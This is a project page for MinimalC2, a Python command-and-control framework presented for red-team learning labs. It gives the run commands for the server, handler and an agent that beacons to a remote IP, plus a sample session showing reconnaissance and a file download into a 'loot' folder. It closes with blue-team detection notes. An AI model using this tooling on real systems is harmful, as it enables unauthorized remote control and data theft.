← Back

MinimalC2

Mar 11, 2026 2 min read

Overview

MinimalC2 is a lightweight command and control framework built in Python for cybersecurity learning and controlled penetration testing labs.

The framework demonstrates core red team infrastructure concepts such as encrypted agent communication, remote command execution, session handling, and operator control through a command line handler console.

The goal of this project focuses on understanding how C2 systems manage compromised hosts, maintain connections through beaconing, and execute commands across multiple active sessions.

Disclaimer

This project exists for educational use and authorised cybersecurity testing environments only. Use inside personal labs, virtual machines, or penetration testing environments with proper permission.

Features

  • AES encrypted communication between C2 server and agents
  • Multi session agent management through a CLI handler console
  • Remote command execution on connected agents
  • Periodic beaconing mechanism for maintaining connections
  • File download capability from compromised hosts
  • Basic system reconnaissance commands such as system info and user identification
  • Session tracking and activity logging
  • Threaded socket server for handling multiple agents concurrently

Usage

Start C2 Server

1

python3 server/c2_server.py --port 4444

Start Handler Console

1

python3 handler/console.py --connect 127.0.0.1 --port 4444

Start Agent

1

python3 agent/agent.py --server 10.10.10.1 --port 4444

Session Management

Example interaction with connected agents.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

minimalc2> sessions

[1] 192.168.1.12 - Linux - Active
[2] 192.168.1.18 - Windows - Active

minimalc2> interact 1

[192.168.1.12]> sysinfo
Hostname: lab-machine
OS: Ubuntu 22.04
User: student

[192.168.1.12]> whoami
student

[192.168.1.12]> ls
Documents
Downloads
notes.txt


[192.168.1.12]> download notes.txt
File saved to ./loot/notes.txt

Architecture

MinimalC2 follows a modular client server architecture.

C2 Server

The server listens for incoming agent connections, manages active sessions, routes commands from the operator, and handles encrypted communication.

Handler Console

The handler console provides an interactive command line interface used by the operator to list sessions, interact with agents, and execute commands.

Agent

The agent connects to the C2 server, sends periodic beacon signals, receives commands, executes them locally, and returns command output to the server.

Project Structure

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18



MinimalC2/

server/
c2_server.py
session_manager.py
encryption.py

handler/
console.py

agent/
agent.py

shared/
protocol.py
config.py

Learning Outcomes

This project demonstrates practical knowledge of command and control infrastructure used in offensive security environments.

Skills developed through this project include:

  • TCP socket programming
  • encrypted communication using AES
  • session and client management
  • remote command execution frameworks
  • network protocol design
  • red team infrastructure concepts

Security Research Value

Studying command and control infrastructure improves defensive security capabilities.

Blue teams detect C2 activity through:

  • monitoring abnormal outbound traffic
  • detecting beaconing patterns
  • identifying encrypted command channels
  • analyzing endpoint telemetry and process activity